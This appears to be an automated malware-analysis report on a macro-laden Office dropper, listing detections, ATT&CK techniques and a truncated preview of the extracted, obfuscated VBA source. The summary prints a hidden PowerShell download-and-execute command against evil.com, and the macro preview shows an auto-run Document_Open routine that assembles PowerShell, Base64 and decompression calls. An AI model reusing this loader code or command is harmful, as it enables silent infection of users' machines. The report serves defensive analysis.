MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers a critical heuristic for Shell() execution, which is further detailed by a VBA p-code auto-execution firing. The script constructs and executes a PowerShell command: powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload')", indicating it downloads and executes a second-stage payload from a remote URL.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6607153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6607153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19006 bytes |
SHA-256: 7e8043428c2ec6d3f1647d0849e3222035e6ffd21992c22a6eb33a57e1c15d04 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tXoiMkVfQOPQE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
pSSda = nldLSI + JlMPPT / fMjGc * kavios * ZvliXA - kjiFY / (40752 / whmIAu * 26472 - dmMBfD)
wSVUI = qniwB + jjDQlm / dAMiuY * TjVjd * DwBQVu - PHpsjF / (41279 / MFJBK * 99880 - Rmnbw)
JSwVI = nfnurn + VKUvo / OGbMi * sjfPc * zIKzXt - wnPhR / (28113 / XozGS * 85514 - ucziGQ)
lJmGLoAiv ("" + XaTBOAirPImwda + HmtJZnza + qUQOu + pjwAI + nWDRjv + HQLAuiAXnahsPz + zXvEkZzk)
fNPQd = joHQG + PsnbS / LufdYY * sHLOi * bsrzn - WwWLa / (84409 / DjIDR * 16451 - FYMXC)
dpEwAB = iWtDSF + MztdRR / SCAfb * jKROhV * uYfOQn - bNjPwS / (43648 / BHwCf * 63995 - mDQZF)
IlEVZZ = fVYszT + uojElQ / ZkDuG * NCjTwz * OLSpA - KXNkK / (33161 / KKjdTR * 46098 - iAAbT)
End Sub
Attribute VB_Name = "FfWzfDnTiM"
Function qUQOu()
On Error Resume Next
IpCqRL = (hDRdE / ACBfBa - 20929 - zCwZYh + (42910 - bIszn + 52370 + XsjcwM / 31816 * 22213))
wjJAlT = (CzlcFd / lVXKGf - 31109 - RbXTor + (24393 - TzJim + 57500 + GaUGjv / 56017 * 7169))
KlwPkp = (PCOicR / DpiRfw - 90686 - HsQjmZ + (68631 - oXtUd + 12799 + FjIiT / 70158 * 28863))
XPSpKpz = "pow" + jFjnjoku + GRsiCTbIkHLZ + "er" + mSwLWhqTMRw + oZENsQKQaqww + "sh" + CsFwKABAQpYYd + FafllnijtSIvO + "ell" + APcsoaHVoQf + OpTmOdVQ + " " + HBUMLdBE + ppIvlHMzFrVGz + "(n" + EzWjkqLhE + UOwrnLrzTZjXB + "eW-" + XKbpBBuuG + XCziHEbunwB + "Obj" + JOAGrYb + USAGPTpZTp + "eCT" + npBoRcwH + WwXfnBnCh + " " + wifiBoIE + MAwWZwSawiN + "iO." + wDikfom + KzpGWKQn + "co"
GoKwb = (OCVcl / wthia - 36248 - cQbNE + (81408 - jScHKI + 80958 + zMmGH / 51587 * 33245))
nVlAw = (njzjM / iaFGcc - 91251 - NSdimt + (39983 - ULdLiK + 49384 + EzkuoY / 24786 * 48852))
DuUkvA = "mP" + mjAiwVKCVs + CDrPlFBHU + "r" + BfrBmpFDEN + PTjfpTHEpBii + "E" + JbTcQAkJzzGUYN + wAdVbvFaLnMwh + "S" + JKpfijbzYzGUhY + uoADhEVVNWtRcn + "sI" + zCwKjhkFWDE + bXBrsSHhvO + "On" + TSIqKUkJiUibK + EujizwAm + "." + ZjVjuDorUPPcP + UNqGsZjhGDmP + "DE" + qTfKwkk + jQpkpvwbfUu + "f" + JfFSsCPcIoEm + jRRbwEkHpCprmJ + "lAT" + upZGKzEf + zAbclzLzNKOt + "e" + zCqCcBQGABu + XljNljQE + "str" + NRrjmwRsAtw + JBDqStAZ + "e"
VqOjTX = (QKUjao / msEVit - 72430 - rKqfua + (70785 - bFwuI + 25166 + dbhcUQ / 43920 * 18683))
lnNdw = (KfWQWc / kVdJiJ - 88830 - NQdZL + (65534 - zKjFfv + 12843 + ZSVOpN / 54502 * 81945))
QSUpjR = (nBXWj / lvSiL - 62429 - zqidD + (83662 - uEHla + 84097 + uPXIaR / 79038 * 84707))
jostva = "Am" + ViNTJBzYwEt + EfvtiitjZPa + "(" + QQjVAWE + CAIwvwj + " [S" + knEYoUdfph + SmZHkjrdDWjOAd + "Yst" + ijwzKrqGzrbM + hWRHjOjoKP + "eM" + UNDpXLZtzFlz + wSKsFfmioNw + "." + jBtZjHYXcDHTQ + XblUVJRQdRKMzl + "io" + sfRtrDjEpNDTP + otoKMccXkO + ".Me" + IVvZmDMOo + GUvjfHGwBasWS + "mO" + MOQHhiHnYit + QCpkqAhqR + "RYS" + QiQipPzcOLqwzh + wjXzlTpiz + "TRE" + jSdkvSTr + YzIjQZFZD + "Am]" + ZliJtzL + ijFHSKlavjiqM + "[" + iPOVujIvsFG + aBUHuOjpsAQGoi + "sYs" + NMMlIaijqC + nMCLdqAtMW + "te"
vHLozn = 75412 + rdPjkN - 48861 * qbwto / bBAril + smNdP * 16040 - 64137
UkqOzP = 11518 + iYfsu - 92076 * zXkRrJ / CjzEc + ikKqQO * 32615 - 47350
mbwBu = 27243 + JRhFAV - 52938 * DoNhJ / smIZt + pbjiM * 28196 - 15339
XdwfUMLE = "m" + dFrQviiE + bVnJEAHf + "." + IFBszrBGUEsCz + nzXfXVnUib + "C" + EYPABqFBXDwREc + JOZYVnRDkznS + "O" + XRcszhFEqLsQ + zFbuzDKPCwdQ + "NV" + QBDmjmjh + fqiFYNfF + "Er" + EiYsVSaHOiPj + noHGkLDRRPPGYF + "T" + SYaZHmdLQNLYS + wPkSjFZUfdmNId + "]::" + VQaLqGBlALwpWz + GTQrnnIitDvvVZ + "F"
BUqIsz = 11160 + NzRXJj - 96883 * wnGpMX / iIrSn + FQbqO * 76225 - 4210
zbiXnrL = "r" + GNYdoWkZ + PzhSfVi + "oM" + zAhSjHip + wwWbjAbotRLYSJ + "b" + IiJLtJnBXGZusW + CiMJtWBSDjlw + "aSE" + iYkkzzfWBnI + aajvXLi + "64S" + wYCmhrHMYrEvY + IXGBjcZA + "tRI" + asWkNlRGt + hMSoOoPR + "nG(" + CYXnAEdo + XiUGzkbKFn + "'" + ZzbKoNRoKjH + TzzNjnRiFo + "VZ" + LoiMELcSXwZMp + XXMnWJifk + "Bf
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.